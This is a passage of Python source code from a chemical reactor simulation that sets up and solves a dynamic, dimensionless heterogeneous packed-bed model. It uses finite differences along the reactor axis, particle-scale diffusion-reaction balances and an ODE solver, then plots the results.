# REVIEW
### uniform nodes ###
# dFdz
dCdz = FiDiDerivative1(dFdz_C, dz, DIFF1_C_SET)
# d2Fdz2
d2Cdz2 = FiDiDerivative2(d2Fdz2_C, dz, DIFF2_C_SET_G)
# REVIEW
# cal differentiate
# backward difference
# dCdz = (Ci_c - Ci_b)/(1*dz)
# convective term
_convectiveTerm = -1*v_z_DiLeVa*dCdz
# central difference for dispersion
# d2Cdz2 = (Ci_b - 2*Ci_c + Ci_f)/(dz**2)
# dispersion term [kmol/m^3.s]
_dispersionFluxC = (BeVoFr*GaDii_DiLeVa[i]/PeNuMa0[i])*d2Cdz2
# concentration in the catalyst surface [kmol/m^3]
# CosSpi_cat
# inward flux [kmol/m^2.s]
# MoFli_z[i] = MaTrCo[i]*(Ci_c - CosSpi_cat[i])
# dimensionless gas-solid mass transfer term per unit bed volume
_inwardFlux = (1/GaMaCoTe0[i])*MoFli_z[i]*SpSuAr
# mass balance
# convective, dispersion, inward flux
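# the terms above assemble the dimensionless gas-phase species balance:
# BeVoFr*(zf/vf)*dC*/dt = -v* * dC*/dz* + (BeVoFr*D*/PeNuMa0)*d2C*/dz*2
#                         - (gas-solid transfer term)/GaMaCoTe0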
# const
_const1 = BeVoFr*(zf/vf)
_const2 = 1/_const1
#
dxdt_F = _const2*(_convectiveTerm +
_dispersionFluxC - _inwardFlux)
dxdtMat[i][0][z] = dxdt_F
### solid phase ###
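# intraparticle diffusion-reaction balance (spherical particle), roughly
# CaPo*dCs/dt = (1/r^2)*d/dr(De*r^2*dCs/dr) + ri, discretized in r by
# FiDiBuildCMatrix_DiLe with the gas-solid film flux as the outer boundary
# condition; radial arrays are flipped because the state stores the surface point first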
# bulk concentration [kmol/m^3]
# Ci_c
# species concentration at different points of particle radius [rNo]
# [Cs[3], Cs[2], Cs[1], Cs[0]]
_Cs_r = CosSpi_r[:, i].flatten()
# Cs[0], Cs[1], ...
_Cs_r_Flip = np.flip(_Cs_r)
# reaction term
_ri_r = ri_r[:, i]
# flip
_ri_r_Flip = np.flip(_ri_r)
# dimensionless analysis
# loop
_dCsdtiVarLoop = (
GaDii_DiLeVa[i], MaTrCo[i], _ri_r_Flip, Ci_c, CaPo, SoMaDiTe0[i], GaDii0[i], rf)
# dC/dt list
dCsdti = FiDiBuildCMatrix_DiLe(
compNo, PaRa, rNo, _Cs_r_Flip, _dCsdtiVarLoop, mode="default", fluxDir="rl")
# const
_const1 = CaPo*(rf**2/GaDii0[i])
_const2 = 1/_const1
#
for r in range(rNo):
# update
dxdtMat[i][r+1][z] = _const2*dCsdti[r]
# NOTE
# energy balance
# bulk temperature [K]
# T_c
# T_c = T_z[z]
# temperature at different points of particle radius [rNo]
# Ts[3], Ts[2], Ts[1], Ts[0]
_Ts_r = Ts_r.flatten()
# check BC
if z == 0 and solverMeshSet is True:
# BC1
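# Danckwerts-type thermal inlet condition with T* = (T - Tf)/Tf, so the inlet
# value T*_0 = (T0 - Tf)/Tf reduces to 0 (feed temperature as reference);
# the ghost node T_b is back-calculated from this condition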
BC1_T_1 = PeNuHe0*dz
BC1_T_2 = 1/BC1_T_1
# forward
T_f = T_z[z+1]
T_ff = T_z[z+2]
# backward
# GaDe_DiLeVa, GaCpMeanMix_DiLeVa, v_z_DiLeVa = 1
# T*[0] = (T0 - Tf)/Tf
T_0 = 0
T_b = (T_0 + BC1_T_2*T_f)/(BC1_T_2 + 1)
T_bb = 0
# function value
dFdz_T = [T_b, T_c, T_f]
d2Fdz2_T = [T_bb, T_b, T_c, T_f, T_ff]
# dFdz
dTdz = FiDiDerivative1(dFdz_T, dz, DIFF1_T_SET)
# d2Fdz2
d2Tdz2 = FiDiDerivative2(d2Fdz2_T, dz, DIFF2_T_SET_BC1)
elif z == 0 and solverMeshSet is False:
# BC1
BC1_T_1 = PeNuHe0*dzs[z]
BC1_T_2 = 1/BC1_T_1
# forward
T_f = T_z[z+1]
T_ff = T_z[z+2]
# backward
# GaDe_DiLeVa, GaCpMeanMix_DiLeVa, v_z_DiLeVa = 1
# T*[0] = (T0 - Tf)/Tf
T_0 = 0
T_b = (T_0 + BC1_T_2*T_f)/(BC1_T_2 + 1)
T_bb = 0
# function value
dFdz_T = [T_b, T_c, T_f]
d2Fdz2_T = [T_bb, T_b, T_c, T_f, T_ff]
# REVIEW
### uniform nodes ###
# dFdz
dTdz = FiDiDerivative1(dFdz_T, dzs[z], DIFF1_T_SET)
# d2Fdz2
# d2Tdz2 = FiDiDerivative2(d2Fdz2_T, dz, DIFF_T_SET_BC1)
# REVIEW
### non-uniform nodes ###
# R value
_zR_b = 0
_zR_c = dzs[z]/dzs[z-1]
# d2Fdz2
d2Tdz2 = FiDiNonUniformDerivative2(
d2Fdz2_T, dzs[z], DIFF2_T_SET_G, _zR_c)
# FIXME
checkME = 0
elif (z > 0 and z < zNoNoDense) and solverMeshSet is False:
# NOTE
# dense section
# i=2,...,zNoNoDense-1
# forward
T_f = T_z[z+1]
T_ff = T_z[z+2]
# backward
T_b = T_z[z-1]
T_bb = T_z[z-2]
# function value
dFdz_T = [T_bb, T_b, T_c, T_f, T_ff]
d2Fdz2_T = [T_bb, T_b, T_c, T_f, T_ff]
# REVIEW
### non-uniform nodes ###
# R value
_zR_b = dzs[z-2]/dzs[z-1]
_zR_c = dzs[z]/dzs[z-1]
#
dTdz = FiDiNonUniformDerivative1(
dFdz_T, dzs[z], DIFF1_T_SET, _zR_b)
# d2Fdz2
d2Tdz2 = FiDiNonUniformDerivative2(
d2Fdz2_T, dzs[z], DIFF2_T_SET_G, _zR_c)
# FIXME
checkME = 0
elif z == zNo - 1:
# BC2
# backward
T_b = T_z[z-1]
T_bb = T_z[z-2]
# forward
T_f = T_b
T_ff = 0
# function value
dFdz_T = [T_b, T_c, T_f]
d2Fdz2_T = [T_bb, T_b, T_c, T_f, T_ff]
# REVIEW
### uniform nodes ###
# dFdz
dTdz = FiDiDerivative1(dFdz_T, dz, DIFF1_T_SET)
# d2Fdz2
d2Tdz2 = FiDiDerivative2(d2Fdz2_T, dz, DIFF2_T_SET_BC2)
else:
# interior nodes
# forward
T_f = T_z[z+1]
T_ff = T_z[z+2] if z < zNo-2 else 0
# backward
T_b = T_z[z-1]
T_bb = T_z[z-2]
# function value
dFdz_T = [T_b, T_c, T_f]
d2Fdz2_T = [T_bb, T_b, T_c, T_f, T_ff]
# REVIEW
### uniform nodes ###
# dFdz
dTdz = FiDiDerivative1(dFdz_T, dz, DIFF1_T_SET)
# d2Fdz2
d2Tdz2 = FiDiDerivative2(d2Fdz2_T, dz, DIFF2_T_SET_G)
# REVIEW
# cal differentiate
# backward difference
# dTdz = (T_c - T_b)/(1*dz)
# convective term
_convectiveTerm = -1*v_z_DiLeVa*GaDe_DiLeVa*GaCpMeanMix_DiLeVa*dTdz
# central difference
# d2Tdz2 = (T_b - 2*T_c + T_f)/(dz**2)
# dispersion flux [kJ/m^3.s]
# _dispersionFluxT = (GaThCoEff*d2Tdz2)*1e-3
_dispersionFluxT = ((1/PeNuHe0)*GaThCoEff_DiLeVa*d2Tdz2)*1
# temperature in the catalyst surface [K]
# Ts_cat
# gas-solid interfacial heat transfer [kJ/m^3.s]
_inwardFluxT = HeTrCo*SpSuAr*Tf*(_Ts_r[0] - T_c)*1e-3
# total heat transfer between gas and solid [kJ/m^3.s]
_heTrBeGaSoTerm = (1/GaHeCoTe0)*_inwardFluxT
# heat exchange term [kJ/m^3.s] -> [no unit]
_heatExchangeTerm = (1/GaHeCoTe0)*Qm
# convective flux, diffusive flux, enthalpy of reaction, cooling heat
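# the terms above assemble the dimensionless gas-phase energy balance:
# GaDe*Cp*BeVoFr*(zf/vf)*dT*/dt = -v* * GaDe*Cp*dT*/dz* + (k_eff/PeNuHe0)*d2T*/dz*2
#   + (gas-solid heat transfer)/GaHeCoTe0 + Qm/GaHeCoTe0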
# const
_const1 = GaDe_DiLeVa*GaCpMeanMix_DiLeVa*BeVoFr*(zf/vf)
_const2 = 1/_const1
#
dxdt_T = _const2*(_convectiveTerm + _dispersionFluxT +
_heTrBeGaSoTerm + _heatExchangeTerm)
dxdtMat[indexT][0][z] = dxdt_T
### solid phase ###
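# intraparticle energy balance, roughly (rho*Cp)_eff*dTs/dt =
# (1/r^2)*d/dr(k_eff*r^2*dTs/dr) + (-dHr)*Ri, discretized in r by
# FiDiBuildTMatrix_DiLe with the gas-solid film heat flux as the outer
# boundary condition; radial arrays are flipped (surface point stored first)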
# _Ts_r
# T[n], T[n-1], ..., T[0] => T[0],T[1], ...
_Ts_r_Flip = np.flip(_Ts_r)
# dC/dt list
# convert
# [J/s.m.K] => [kJ/s.m.K]
SoThCoEff_Conv = CaPo*SoThCoMix0/1000
# OvHeReT [kJ/m^3.s]
OvHeReT_Conv = np.flip(-1*OvHeReT)
# HeTrCo [J/m^2.s.K] => [kJ/m^2.s.K]
HeTrCo_Conv = HeTrCo/1000
# var loop
_dTsdtiVarLoop = (SoThCoEff_DiLeVa, HeTrCo_Conv,
OvHeReT_Conv, T_c, CaPo, SoHeDiTe0, SoThCoEff_Conv, rf)
# dTs/dt list
dTsdti = FiDiBuildTMatrix_DiLe(
compNo, PaRa, rNo, _Ts_r_Flip, _dTsdtiVarLoop)
# const
_const1 = SoCpMeanMixEff_ReVa*Tf/SoHeDiTe0
_const2 = 1/_const1
#
for r in range(rNo):
# update
dxdtMat[indexT][r+1][z] = _const2[r]*dTsdti[r]
# NOTE
# flat
dxdt = dxdtMat.flatten().tolist()
# print
strTime = "time: {:.5f} seconds".format(t)
# print(strTime)
print(f"time: {t} seconds")
return dxdt
# NOTE
# dynamic heterogeneous modeling
def runM8(self):
"""
modeling case (dimensionless)
dynamic model
unknowns: Ci, T (dynamic), P, v (static), Cci, Tc (static, for catalyst)
CT, GaDe = f(P, T, n)
numerical method: finite difference
"""
# NOTE
# start computation
start = timer()
# solver setting
solverConfig = self.modelInput['solver-config']
solverIVPSet = solverConfig['ivp']
solverMesh = solverConfig['mesh']
solverMeshSet = (solverMesh == "normal")
# operating conditions
P = self.modelInput['operating-conditions']['pressure']
T = self.modelInput['operating-conditions']['temperature']
# operation time [s]
opT = self.modelInput['operating-conditions']['period']
# reaction list
reactionDict = self.modelInput['reactions']
reactionList = rmtUtil.buildReactionList(reactionDict)
# number of reactions
reactionListNo = len(reactionList)
# component list
compList = self.modelInput['feed']['components']['shell']
# graph label setting
labelList = compList.copy()
labelList.append("Temperature")
# labelList.append("Pressure")
# component no
compNo = len(compList)
indexTemp = compNo
indexPressure = indexTemp + 1
indexVelocity = indexPressure + 1
# reactor spec
ReSpec = self.modelInput['reactor']
# reactor inner diameter [m]
ReInDi = ReSpec['ReInDi']
# reactor length [m]
ReLe = ReSpec['ReLe']
# cross-sectional area [m^2]
CrSeAr = CONST.PI_CONST*(ReInDi ** 2)/4
# particle diameter [m]
PaDi = ReSpec['PaDi']
# bed void fraction - porosity
BeVoFr = ReSpec['BeVoFr']
## inlet values ##
# inlet volumetric flowrate at T,P [m^3/s]
VoFlRa0 = self.modelInput['feed']['volumetric-flowrate']
# inlet species concentration [kmol/m^3]
SpCoi0 = np.array(self.modelInput['feed']['concentration'])
# inlet total concentration [kmol/m^3]
SpCo0 = np.sum(SpCoi0)
# inlet superficial velocity [m/s]
SuGaVe0 = self.modelInput['feed']['superficial-velocity']
# reaction rate expression
reactionRateExpr = self.modelInput['reaction-rates']
# component molecular weight [g/mol]
MoWei = rmtUtil.extractCompData(self.internalData, "MW")
# external heat
ExHe = self.modelInput['external-heat']
# diffusivity coefficient - gas phase [m^2/s]
GaDii0 = self.modelInput['feed']['diffusivity']
# gas viscosity [Pa.s]
GaVii0 = self.modelInput['feed']['viscosity']
# gas mixture viscosity [Pa.s]
GaViMix0 = self.modelInput['feed']['mixture-viscosity']
# thermal conductivity - gas phase [J/s.m.K]
GaThCoi0 = self.modelInput['feed']['thermal-conductivity']
# mixture thermal conductivity - gas phase [J/s.m.K]
GaThCoMix0 = self.modelInput['feed']['mixture-thermal-conductivity']
# REVIEW
# domain length
DoLe = 1
# orthogonal collocation points in the r direction
rNo = solverSetting['S2']['rNo']
# mesh setting
zMesh = solverSetting['T1']['zMesh']
# number of nodes
zNoNo = zMesh['zNoNo']
# domain length section
DoLeSe = zMesh['DoLeSe']
# mesh refinement degree
MeReDe = zMesh['MeReDe']
# mesh installment
if solverMeshSet is False:
zMeshRes = FiDiMeshGenerator(zNoNo, DoLe, DoLeSe, MeReDe)
# finite difference points
dataXs = zMeshRes['data1']
# dz lengths
dzs = zMeshRes['data2']
# finite difference point number
zNo = zMeshRes['data3']
# R ratio
zR = zMeshRes['data4']
# dz
dz = zMeshRes['data5']
else:
# finite difference points in the z direction
zNo = solverSetting['T1']['zNo']
# length list [reactor length]
dataXs = np.linspace(0, DoLe, zNo)
# element size - dz [m]
dz = DoLe/(zNo-1)
# reset
dzs = []
zR = []
### calculation ###
# mole fraction in the gas phase
MoFri0 = np.array(rmtUtil.moleFractionFromConcentrationSpecies(SpCoi0))
# mixture molecular weight [kg/mol]
MiMoWe0 = rmtUtil.mixtureMolecularWeight(MoFri0, MoWei, "kg/mol")
# gas density [kg/m^3]
GaDe0 = calDensityIG(MiMoWe0, SpCo0*1000)
# heat capacity at constant pressure of mixture Cp [kJ/kmol.K] | [J/mol.K]
# Cp mean list
GaCpMeanList0 = calMeanHeatCapacityAtConstantPressure(compList, T)
# Cp mixture
GaCpMeanMix0 = calMixtureHeatCapacityAtConstantPressure(
MoFri0, GaCpMeanList0)
# thermal diffusivity in the gas phase [m^2/s]
GaThDi = calThermalDiffusivity(
GaThCoMix0, GaDe0, GaCpMeanMix0, MiMoWe0)
# var no (Ci,T)
varNo = compNo + 1
# concentration var no
varNoCon = compNo*zNo
# temperature var no
varNoTemp = 1*zNo
# concentration in solid phase
varNoConInSolidBlock = rNo*compNo
# total number
varNoConInSolid = varNoConInSolidBlock*zNo
# total var no along the reactor length (in gas phase)
varNoT = varNo*zNo
# number of layers
# concentration layer for each component C[m,j,i]
# m: layer, j: row (rNo), i: column (zNo)
# number of layers
noLayer = compNo + 1
# var no in each layer
varNoLayer = zNo*(rNo+1)
# total number of vars (Ci,T,Cci,Tci)
varNoLayerT = noLayer*varNoLayer
# concentration var number
varNoCon = compNo*varNoLayer
# number of var rows [j]
varNoRows = rNo + 1
# number of var columns [i]
varNoColumns = zNo
# initial values at t = 0 and z >> 0
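# state layout: one layer per component plus one temperature layer; each layer
# is a (rNo+1) x zNo grid where row j=0 holds the gas phase and rows j=1..rNo
# hold the particle (solid phase) points; the 3D array is flattened before
# being passed to the ODE solver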
IVMatrixShape = (noLayer, varNoRows, varNoColumns)
IV2D = np.zeros(IVMatrixShape)
# initialize IV2D
# -> concentration [kmol/m^3]
for m in range(noLayer - 1):
for i in range(varNoColumns):
for j in range(varNoRows):
# separate phase
if j == 0:
# gas phase
IV2D[m][j][i] = SpCoi0[m]/np.max(SpCoi0) # SpCoi0[m]
else:
# solid phase
# SpCoi0[m]/np.max(SpCoi0) # SpCoi0[m]
# SpCoi0[m]/np.max(SpCoi0) # SpCoi0[m]
IV2D[m][j][i] = 1e-6
# temperature
for i in range(varNoColumns):
for j in range(varNoRows):
# separate phase
if j == 0:
# gas phase
IV2D[noLayer - 1][j][i] = 0 # T
else:
# solid phase
IV2D[noLayer - 1][j][i] = 0 # T
# flatten IV
IV = IV2D.flatten()
# print(f"IV: {IV}")
# parameters
# component data
reactionListSorted = self.reactionListSorted
# reaction coefficient
reactionStochCoeff = self.reactionStochCoeffList
# standard heat of reaction at 25C [kJ/kmol]
StHeRe25 = np.array(
list(map(calStandardEnthalpyOfReaction, reactionList)))
# REVIEW
# solver setting
# orthogonal collocation method
OrCoClassSet = OrCoClass()
OrCoClassSetRes = OrCoClassSet.buildMatrix()
# NOTE
### dimensionless analysis ###
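# scaling conventions used below: concentrations are scaled by the feed values
# (C* = C/Cref), temperature by T* = (T - Tf)/Tf, velocity by vf, axial length
# by zf, and radial length by rf; real values are recovered later with
# rmtUtil.calRealDiLessValue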
# concentration [kmol/m^3]
Cif = np.copy(SpCoi0)
# total concentration
Cf = SpCo0
# temperature [K]
Tf = T
# superficial velocity [m/s]
vf = SuGaVe0
# length [m]
zf = ReLe
# diffusivity [m^2/s]
Dif = np.copy(GaDii0)
# heat capacity at constant pressure [J/mol.K] | [kJ/kmol.K]
Cpif = np.copy(GaCpMeanList0)
# mixture heat capacity [J/mol.K] | [kJ/kmol.K]
Cpf = GaCpMeanMix0
# radius
rf = PaDi/2
# gas phase
# mass convective term - (list) [kmol/m^3.s]
_Cif = Cif if MODEL_SETTING['GaMaCoTe0'] != "MAX" else np.repeat(
np.max(Cif), compNo)
GaMaCoTe0 = (vf/zf)*_Cif
# mass diffusive term - (list) [kmol/m^3.s]
GaMaDiTe0 = (1/zf**2)*(_Cif*Dif)
# heat convective term [kJ/m^3.s]
GaHeCoTe0 = (GaDe0*vf*Tf*(Cpf/MiMoWe0)/zf)*1e-3
# heat diffusive term [kJ/m^3.s]
GaHeDiTe0 = (Tf*GaThCoMix0/zf**2)*1e-3
# solid phase
# mass diffusive term - (list) [kmol/m^3.s]
SoMaDiTe0 = (Dif*_Cif)/rf**2
# heat diffusive term [kJ/m^3.s]
SoHeDiTe0 = (GaThCoMix0*Tf/rf**2)*1e-3
### dimensionless numbers ###
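# standard definitions: Re = rho*v*dp/mu, Sc = mu/(rho*D), Pr = Cp*mu/k
# (Cp per unit mass); Sh is estimated from Re and Sc via the Frossling-type
# correlation selected by CONST_EQ_Sh, and Nu analogously from Pr and Re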
# Re Number
ReNu0 = calReNoEq1(GaDe0, SuGaVe0, PaDi, GaViMix0)
# Sc Number
ScNu0 = calScNoEq1(GaDe0, GaViMix0, GaDii0)
# Sh Number (choose method)
ShNu0 = calShNoEq1(ScNu0, ReNu0, CONST_EQ_Sh['Frossling'])
# Prandtl Number
PrNu0 = calPrNoEq1(GaCpMeanMix0, GaViMix0, GaThCoMix0, MiMoWe0)
# Nu number
NuNu0 = calNuNoEq1(PrNu0, ReNu0)
# Strouhal number
StNu = 1
# Peclet number - mass transfer
PeNuMa0 = (vf*zf)/Dif
# Peclet number - heat transfer
PeNuHe0 = (zf*GaDe0*(Cpf/MiMoWe0)*vf)/GaThCoMix0
### transfer coefficient ###
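# assuming the usual film-theory forms: MaTrCo = Sh*D/dp and HeTrCo = Nu*k/dp,
# evaluated at feed conditions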
# mass transfer coefficient - gas/solid [m/s]
MaTrCo = calMassTransferCoefficientEq1(ShNu0, GaDii0, PaDi)
# heat transfer coefficient - gas/solid [J/m^2.s.K]
HeTrCo = calHeatTransferCoefficientEq1(NuNu0, GaThCoMix0, PaDi)
# fun parameters
FunParam = {
"compList": compList,
"const": {
"CrSeAr": CrSeAr,
"MoWei": MoWei,
"StHeRe25": StHeRe25,
"GaMiVi": GaViMix0,
"varNo": varNo,
"varNoT": varNoT,
"reactionListNo": reactionListNo,
},
"ReSpec": ReSpec,
"ExHe": ExHe,
"constBC1": {
"VoFlRa0": VoFlRa0,
"SpCoi0": SpCoi0,
"SpCo0": SpCo0,
"P0": P,
"T0": T,
"SuGaVe0": SuGaVe0,
"GaDii0": GaDii0,
"GaThCoi0": GaThCoi0,
"GaVii0": GaVii0,
"GaDe0": GaDe0,
"GaCpMeanMix0": GaCpMeanMix0,
"GaThCoMix0": GaThCoMix0
},
"meshSetting": {
"solverMesh": solverMesh,
"solverMeshSet": solverMeshSet,
"noLayer": noLayer,
"varNoLayer": varNoLayer,
"varNoLayerT": varNoLayerT,
"varNoRows": varNoRows,
"varNoColumns": varNoColumns,
"rNo": rNo,
"zNo": zNo,
"dz": dz,
"dzs": dzs,
"zR": zR,
"zNoNo": zNoNo
},
"solverSetting": {
"dFdz": solverSetting['T1']['dFdz'],
"d2Fdz2": solverSetting['T1']['d2Fdz2'],
"dTdz": solverSetting['T1']['dTdz'],
"d2Tdz2": solverSetting['T1']['d2Tdz2'],
"OrCoClassSetRes": OrCoClassSetRes
},
"reactionRateExpr": reactionRateExpr
}
# dimensionless analysis parameters
DimensionlessAnalysisParams = {
"Cif": Cif,
"Tf": Tf,
"vf": vf,
"zf": zf,
"Dif": Dif,
"Cpif": Cpif,
"Cpf": Cpf,
"rf": rf,
"GaMaCoTe0": GaMaCoTe0,
"GaMaDiTe0": GaMaDiTe0,
"GaHeCoTe0": GaHeCoTe0,
"GaHeDiTe0": GaHeDiTe0,
"ReNu0": ReNu0,
"ScNu0": ScNu0,
"ShNu0": ShNu0,
"PrNu0": PrNu0,
"PeNuMa0": PeNuMa0,
"PeNuHe0": PeNuHe0,
"MaTrCo": MaTrCo,
"HeTrCo": HeTrCo,
"SoMaDiTe0": SoMaDiTe0,
"SoHeDiTe0": SoHeDiTe0
}
# time span
tNo = solverSetting['S2']['tNo']
opTSpan = np.linspace(0, opT, tNo + 1)
# save data
timesNo = solverSetting['S2']['timesNo']
# result
dataPack = []
# build data list
# over time
dataPacktime = np.zeros((varNo, tNo, zNo))
#
# solver selection
# BDF, Radau, LSODA
solverIVP = "LSODA" if solverIVPSet == 'default' else solverIVPSet
# time loop
for i in range(tNo):
# set time span
t = np.array([opTSpan[i], opTSpan[i+1]])
times = np.linspace(t[0], t[1], timesNo)
# ode call
# method [1]: LSODA, [2]: BDF, [3]: Radau
# options
solverOptions = {
"atol": 1e-7
}
sol = solve_ivp(PackedBedReactorClass.modelEquationM8,
t, IV, method=solverIVP, t_eval=times, args=(reactionListSorted, reactionStochCoeff, FunParam, DimensionlessAnalysisParams), **solverOptions)
# ode result
successStatus = sol.success
# check
if successStatus is False:
raise RuntimeError(f"ODE integration failed: {sol.message}")
# time interval
dataTime = sol.t
# all results
# components, temperature layers
dataYs = sol.y
# std format
dataYs_Reshaped = np.reshape(
dataYs[:, -1], (noLayer, varNoRows, varNoColumns))
# component concentration [kmol/m^3]
# Ci and Cs
# dataYs1 = dataYs[0:varNoCon, -1]
# 3d matrix
# dataYs1_Reshaped = np.reshape(
# dataYs1, (compNo, varNoRows, varNoColumns))
dataYs1_Reshaped = dataYs_Reshaped[:-1]
# gas phase
dataYs1GasPhase = dataYs1_Reshaped[:, 0, :]
# solid phase
dataYs1SolidPhase = dataYs1_Reshaped[:, 1:, :]
# REVIEW
# convert concentration to mole fraction
dataYs1_Ctot = np.sum(dataYs1GasPhase, axis=0)
dataYs1_MoFri = dataYs1GasPhase/dataYs1_Ctot
# temperature - 2d matrix
# dataYs2 = np.array([dataYs[varNoCon:varNoLayerT, -1]])
# 2d matrix
# dataYs2_Reshaped = np.reshape(
# dataYs2, (1, varNoRows, varNoColumns))
dataYs2_Reshaped = dataYs_Reshaped[indexTemp]
# gas phase
dataYs2GasPhase = dataYs2_Reshaped[0, :].reshape((1, zNo))
# solid phase
dataYs2SolidPhase = dataYs2_Reshaped[1:, :]
# combine
_dataYs = np.concatenate(
(dataYs1_MoFri, dataYs2GasPhase), axis=0)
# save data
dataPack.append({
"successStatus": successStatus,
"dataTime": dataTime[-1],
"dataYCon": dataYs1GasPhase,
"dataYTemp": dataYs2GasPhase,
"dataYs": _dataYs,
"dataYCons": dataYs1SolidPhase,
"dataYTemps": dataYs2SolidPhase,
})
for m in range(varNo):
# var list
dataPacktime[m][i, :] = dataPack[i]['dataYs'][m, :]
# update initial values [IV]
IV = dataYs[:, -1]
# NOTE
# end of computation
end = timer()
elapsed = roundNum(end - start)
# NOTE
# steady-state result
# txt
# ssModelingResult = np.loadtxt('ssModeling.txt', dtype=np.float64)
# binary
ssModelingResult = np.load('ResM1.npy')
# ssdataXs = np.linspace(0, ReLe, zNo)
ssXYList = pltc.plots2DSetXYList(dataXs, ssModelingResult)
ssdataList = pltc.plots2DSetDataList(ssXYList, labelList)
# datalists
ssdataLists = [ssdataList[0:compNo],
ssdataList[indexTemp]]
# subplot result
# pltc.plots2DSub(ssdataLists, "Reactor Length (m)",
# "Concentration (mol/m^3)", "1D Plug-Flow Reactor")
# plot info
plotTitle = f"Dynamic Modeling for opT: {opT} with zNo: {zNo}, tNo: {tNo} within {elapsed} seconds"
# REVIEW
# display result at specific time
for i in range(tNo):
# var list
_dataYs = dataPack[i]['dataYs']
# plot setting: build (x,y) series
XYList = pltc.plots2DSetXYList(dataXs, _dataYs)
# -> add label
dataList = pltc.plots2DSetDataList(XYList, labelList)
# datalists
dataLists = [dataList[0:compNo],
dataList[indexTemp]]
if i == tNo-1:
# subplot result
pltc.plots2DSub(dataLists, "Reactor Length (m)",
"Concentration (mol/m^3)", plotTitle, ssdataLists)
# REVIEW
# display result within time span
_dataListsLoop = []
_labelNameTime = []
for i in range(varNo):
# var list
_dataPacktime = dataPacktime[i]
# plot setting: build (x,y) series
XYList = pltc.plots2DSetXYList(dataXs, _dataPacktime)
# -> add label
# build label
for t in range(tNo):
_name = labelList[i] + " at t=" + str(opTSpan[t+1])
_labelNameTime.append(_name)
dataList = pltc.plots2DSetDataList(XYList, _labelNameTime)
# datalists
_dataListsLoop.append(dataList[0:tNo])
# reset
_labelNameTime = []
# select items
# indices = [0, 2, -1]
# selected_elements = [_dataListsLoop[index] for index in indices]
# select datalist
_dataListsSelected = selectFromListByIndex([1, -1], _dataListsLoop)
# subplot result
# pltc.plots2DSub(_dataListsSelected, "Reactor Length (m)",
# "Concentration (mol/m^3)", "Dynamic Modeling of 1D Plug-Flow Reactor")
# return
res = {
"XYList": XYList,
"dataList": dataList
}
return res
def modelEquationM8(t, y, reactionListSorted, reactionStochCoeff, FunParam, DimensionlessAnalysisParams):
"""
M8 model [dynamic modeling]
mass, energy, and momentum balance equations
modelParameters:
reactionListSorted: reactant/product and coefficient lists
reactionStochCoeff: reaction stoichiometric coefficient
FunParam:
compList: component list
const
CrSeAr: reactor cross sectional area [m^2]
MoWei: component molecular weight [g/mol]
StHeRe25: standard heat of reaction at 25C [kJ/kmol] | [J/mol]
GaMiVi: gas mixture viscosity [Pa.s]
varNo: number of variables (Ci, CT, T)
varNoT: number of variables in the domain (zNo*varNoT)
reactionListNo: reaction list number
ReSpec: reactor spec
ExHe: exchange heat spec
OvHeTrCo: overall heat transfer coefficient [J/m^2.s.K]
EfHeTrAr: effective heat transfer area [m^2]
MeTe: medium temperature [K]
constBC1:
VoFlRa0: inlet volumetric flowrate [m^3/s],
SpCoi0: species concentration [kmol/m^3],
SpCo0: total concentration [kmol/m^3]
P0: inlet pressure [Pa]
T0: inlet temperature [K]
meshSetting:
solverMesh: mesh installment
solverMeshSet:
true: normal
false: mesh refinement
noLayer: number of layers
varNoLayer: var no in each layer
varNoLayerT: total number of vars (Ci,T,Cci,Tci)
varNoRows: number of var rows [j]
varNoColumns: number of var columns [i]
zNo: number of finite difference in z direction
rNo: number of orthogonal collocation points in r direction
dz: differential length [m]
dzs: differential length list [-]
zR: z ratio
zNoNo: number of nodes in the dense and normal sections
solverSetting:
OrCoClassSetRes: constants of OC methods
reactionRateExpr: reaction rate expressions
DimensionlessAnalysisParams:
Cif: feed concentration [kmol/m^3]
Tf: feed temperature
vf: feed superficial velocity [m/s]
zf: domain length [m]
Dif: diffusivity coefficient of component [m^2/s]
Cpif: feed heat capacity at constant pressure [kJ/kmol.K] | [J/mol.K]
rf: particle radius [m]
GaMaCoTe0: feed mass convective term of gas phase [kmol/m^3.s]
GaMaDiTe0: feed mass diffusive term of gas phase [kmol/m^3.s]
GaHeCoTe0: feed heat convective term of gas phase [kJ/m^3.s]
GaHeDiTe0: feed heat diffusive term of gas phase [kJ/m^3.s]
SoMaDiTe0: feed mass diffusive term of solid phase [kmol/m^3.s]
SoHeDiTe0: feed heat diffusive term of solid phase [kJ/m^3.s]
ReNu0: Reynolds number
ScNu0: Schmidt number
ShNu0: Sherwood number
PrNu0: Prandtl number
PeNuMa0: mass Peclet number
PeNuHe0: heat Peclet number
MaTrCo: mass transfer coefficient - gas/solid [m/s]
HeTrCo: heat transfer coefficient - gas/solid [J/m^2.s.K]
"""
# fun params
# component symbol list
comList = FunParam['compList']
# const ->
const = FunParam['const']
# cross-sectional area [m^2]
CrSeAr = const['CrSeAr']
# component molecular weight [g/mol]
MoWei = const['MoWei']
# standard heat of reaction at 25C [kJ/kmol] | [J/mol]
StHeRe25 = const['StHeRe25']
# gas viscosity [Pa.s]
GaMiVi = const['GaMiVi']
# reaction no
reactionListNo = const['reactionListNo']
# reactor spec ->
ReSpec = FunParam['ReSpec']
# particle diameter [m]
PaDi = ReSpec['PaDi']
# bed void fraction - porosity
BeVoFr = ReSpec['BeVoFr']
# bulk density (catalyst bed density)
CaBeDe = ReSpec['CaBeDe']
# catalyst density [kgcat/m^3 of particle]
CaDe = ReSpec['CaDe']
# catalyst heat capacity at constant pressure [kJ/kg.K]
CaSpHeCa = ReSpec['CaSpHeCa']
# catalyst porosity
CaPo = ReSpec['CaPo']
# catalyst tortuosity
CaTo = ReSpec['CaTo']
# catalyst thermal conductivity [J/K.m.s]
CaThCo = ReSpec['CaThCo']
# exchange heat spec ->
ExHe = FunParam['ExHe']
# var no. (concentration, temperature)
varNo = const['varNo']
# var no. in the domain
varNoT = const['varNoT']
# boundary conditions constants
constBC1 = FunParam['constBC1']
## inlet values ##
# inlet volumetric flowrate at T,P [m^3/s]
VoFlRa0 = constBC1['VoFlRa0']
# inlet species concentration [kmol/m^3]
SpCoi0 = constBC1['SpCoi0']
# inlet total concentration [kmol/m^3]
SpCo0 = constBC1['SpCo0']
# inlet pressure [Pa]
P0 = constBC1['P0']
# inlet temperature [K]
T0 = constBC1['T0']
# inlet superficial velocity [m/s]
# SuGaVe0 = constBC1['SuGaVe0']
# inlet diffusivity coefficient [m^2/s]
GaDii0 = constBC1['GaDii0']
# inlet gas thermal conductivity [J/s.m.K]
GaThCoi0 = constBC1['GaThCoi0']
# gas viscosity
GaVii0 = constBC1['GaVii0']
